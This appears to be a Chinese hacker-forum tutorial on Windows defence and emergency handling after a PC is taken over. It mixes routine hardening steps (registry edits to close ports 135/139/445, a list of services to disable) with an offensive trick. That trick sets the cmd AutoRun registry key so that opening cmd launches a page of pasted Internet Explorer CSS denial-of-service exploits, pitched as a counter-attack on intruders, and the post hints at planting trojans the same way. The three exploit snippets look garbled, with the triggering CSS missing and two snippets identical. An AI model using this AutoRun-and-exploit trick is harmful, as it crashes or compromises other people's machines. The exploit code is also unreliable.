防御黑客和被當做肉雞后的緊急處理
03月07日 17:27 作者:
不滅的神話(huà)防御黑客和被當做肉雞后的緊急處理
大家好,好久沒(méi)做教程了。大家好 我是黑吧lius QQ 誰(shuí)無(wú)虎落平陽(yáng)
今天給大家講下怎么防御黑客和被當做肉雞后的緊急處理
首先說(shuō)下怎么緊急處理
1。在成為別人肉雞后的緊急處理辦法
原理:黑客慣用cmd 打開(kāi)cmd時(shí)我們可以搞些設置 具體請打開(kāi)注冊表 如果對方打開(kāi)cmd想搞東西 我們就可以利用這個(gè)別人搞我們的程序 反過(guò)去搞別人 看操作
打開(kāi) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor 我就不具體打開(kāi)了 路徑都告訴大家了
找到AutoRun 這個(gè),AutoRun 修改這 我以C盤(pán)做例子 好 我們再試下開(kāi)cmd 再給大家演示下 是吧 只要不關(guān)閉cmd就一直跳出我們設置的1.htm嚇人吧
就會(huì )出來(lái)我們的頁(yè)面吧 我這有幾個(gè)IE CSS畸形寬度單元標記拒絕服務(wù)漏洞 我已經(jīng)給大家復制過(guò)來(lái)了 看
系統編號:BES200612758
危害級別:★★★☆☆☆
影響版本:
Microsoft Internet Explorer 7.0
Microsoft Internet Explorer 7 Beta 2
Microsoft Internet Explorer 7 Beta 1
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 6.0
詳細說(shuō)明:
Internet Explorer是微軟發(fā)布的非常流行的WEB瀏覽器。
Internet Explorer在處理畸形的HTML標記時(shí)存在漏洞,遠程攻擊者可能利用此漏洞導致用戶(hù)機器不可用。
如果用戶(hù)使用IE訪(fǎng)問(wèn)了設置有特制CSS寬度單元的WEB頁(yè)面的話(huà),就會(huì )導致iexplore.exe耗盡100%的CPU資源。
參考:
José_Carlos_Nieto_Jarquín (
xiam.core@gmail.com)
Andrius Paurys (
andrius.paurys@gmail.com)
鏈接:
http://marc.theaimsgroup.com/?l=bugtraq&m=116542162532025&w=2解決方案:
http://www.microsoft.com/windows/ie/default.asp程序代碼
<html>
<head>
<title>Another non-standards compliant IE D.O.S.</title>
</head>
<body>
<div >
<table >
<tr><td></td></tr>
</table>
</div>
Written by <a href="
sky.http://www.skylw.cn">sky</a>.<br />
Tested under IE 6.0.2900.2180
</body>
</html>
(IE會(huì )阻止頁(yè)面彈出,允許彈出的話(huà)IE會(huì )占去大部分的資源,造成IE自定死掉.對自己電腦沒(méi)有信心的勿試,可能死機)
Exploit 2
程序代碼
<html>
<head>
<title>Another non-standards compliant IE D.O.S.</title>
</head>
<body>
<div >
<table >
<tr><td></td></tr>
</table>
</div>
Written by <a href="
sky.http://www.skylw.cn">sky</a>.<br />
Tested under IE 6.0.2900.2180
</body>
</html>
(這個(gè)代碼的效果沒(méi)有第一個(gè)那么可怕,只是會(huì )彈出5個(gè)頁(yè)面)
Exploit 3
程序代碼
<html>
<head>
<title>Another non-standards compliant IE D.O.S.</title>
</head>
<body>
<div >
<table >
<tr>
<td>
測試.測試.
</td>
</tr>
</table>
</div>
Written by <a href="
sky.http://www.skylw.cn">sky</a>.<br />
Tested under IE 6.0.2900.2180
</body>
</html>
(這個(gè)代碼的效果沒(méi)有第一個(gè)那么可怕,和第二個(gè)一樣只是會(huì )彈出5個(gè)頁(yè)面)
如果做成網(wǎng)頁(yè) 還設置成1.htm就完了 我自己電腦是不敢測試 上次已經(jīng)試過(guò)了 搞的我死機了
這可以發(fā)散下 我們可以弄自己的木馬等等 具體就不能再教了 時(shí)間限制嘛 再說(shuō)我技術(shù)也不行嘿嘿
下面給大家將下iexplore.exe是進(jìn)程還是病毒 問(wèn)題
2。iexplore.exe是進(jìn)程還是病毒 問(wèn)題
iexplore.exe是Microsoft Internet Explorer的主程序。這個(gè)微軟Windows應用程序讓你在網(wǎng)上沖浪,和訪(fǎng)問(wèn)本地Interanet網(wǎng)絡(luò )。這不是純粹的系統程序,但是如果終止它,可能會(huì )導致不可知的問(wèn)題。iexplore.exe同時(shí)也是Avant網(wǎng)絡(luò )瀏覽器的一部分,這是一個(gè)免費的基于Internet Explorer的瀏覽器。注意iexplore.exe也有可能是Trojan.KillAV.B病毒,該病毒會(huì )終止你的反病毒軟件,和一些Windows系統工具,該進(jìn)程的安全等級是建議刪除。
這個(gè)東西可以說(shuō)是病毒,也可以說(shuō)不是病毒。 大家得仔細看進(jìn)程了不要被蒙騙 但也不要亂關(guān) 看我演示下
先讓大家看下我沒(méi)有iexplore.exe 沒(méi)有吧 我們現在再開(kāi)啟 看 有了吧 就是我剛開(kāi)的 好了這個(gè)問(wèn)題我寫(xiě)的很詳細了
接下來(lái)快速看下關(guān)閉幾個(gè)危險的端口
3。關(guān)閉危險的端口 135.139.445等 寫(xiě)很詳細我就不多演示了 很簡(jiǎn)單的
A.刪除ipc$空連接
在運行內輸入regedit,在注冊表中找到 HKEY-LOCAL_MACHINE→SYSTEM→CurrentControSet→Control→LSA項里
數值名稱(chēng)RestrictAnonymous的數值數據由0改為1。
B.135端口的關(guān)閉
HKEY_LOCAL_MACHINE→SOFTWARE→Microsoft→Ole→EnableDCOM的值改為“N”
HKEY_LOCAL_MACHINE→SOFTWARE→Microsoft→Rpc→DCOM Protocols 中刪除“ncacn_ip_tcp”
此外,還需要停用“Distributed Transaction Coordinator”服務(wù)。
C.139端口的關(guān)閉
在“網(wǎng)絡(luò )和撥號連接”中“本地連接”中選取“Internet協(xié)議(TCP/IP)”屬性,進(jìn)入“高級TCP/IP設置”
“WinS設置”里面有一項“禁用TCP/IP的NETBIOS”,打勾
D.445端口的關(guān)閉
HKEY_LOCAL_MACHINE→System→CurrentControlSet→Services→NetBT→Parameters
建立一個(gè)SMBDeviceEnabled 為REG_DWORD類(lèi)型鍵值為0
最后為大家送上禁止一些危險的服務(wù)
4。禁止一些危險的服務(wù)
大家去下管理就可以 一個(gè)個(gè)對下去設置 OK了
1.Alerter[通知選定的用戶(hù)和計算機管理警報]
2.ClipBook[啟用“剪貼簿查看器”儲存信息并與遠程計算機共享]
3.Distributed File System[將分散的文件共享合并成一個(gè)邏輯名稱(chēng),共享出去,關(guān)閉后遠程計算機無(wú)法訪(fǎng)問(wèn)共享
4.Distributed Link Tracking Server[適用局域網(wǎng)分布式鏈接]
5.Indexing Service[提供本地或遠程計算機上文件的索引內容和屬性,泄露信息]
6.Messenger[警報]
7.NetMeeting Remote Desktop Sharing[netmeeting公司留下的客戶(hù)信息收集]
8.Network DDE[為在同一臺計算機或不同計算機上運行的程序提供動(dòng)態(tài)數據交換]
9.Network DDE DSDM[管理動(dòng)態(tài)數據交換 (DDE) 網(wǎng)絡(luò )共享]
10.Remote Desktop Help Session Manager[管理并控制遠程協(xié)助]
11.Remote Registry[使遠程計算機用戶(hù)修改本地注冊表]
12.Routing and Remote Access[在局域網(wǎng)和廣域往提供路由服務(wù).黑客理由路由服務(wù)刺探注冊信息]
13.Server[支持此計算機通過(guò)網(wǎng)絡(luò )的文件、打印、和命名管道共享]
14.TCP/IPNetBIOS Helper[提供 TCP/IP 服務(wù)上的 NetBIOS 和網(wǎng)絡(luò )上客戶(hù)端的 NetBIOS 名稱(chēng)解析的支持而使用戶(hù)能夠共享文件、打印和登錄到網(wǎng)絡(luò )]
15.Telnet[允許遠程用戶(hù)登錄到此計算機并運行程序]
16.Terminal Services[允許用戶(hù)以交互方式連接到遠程計算機]
17.Window s Image Acquisition (WIA)[照相服務(wù),應用與數碼攝象機]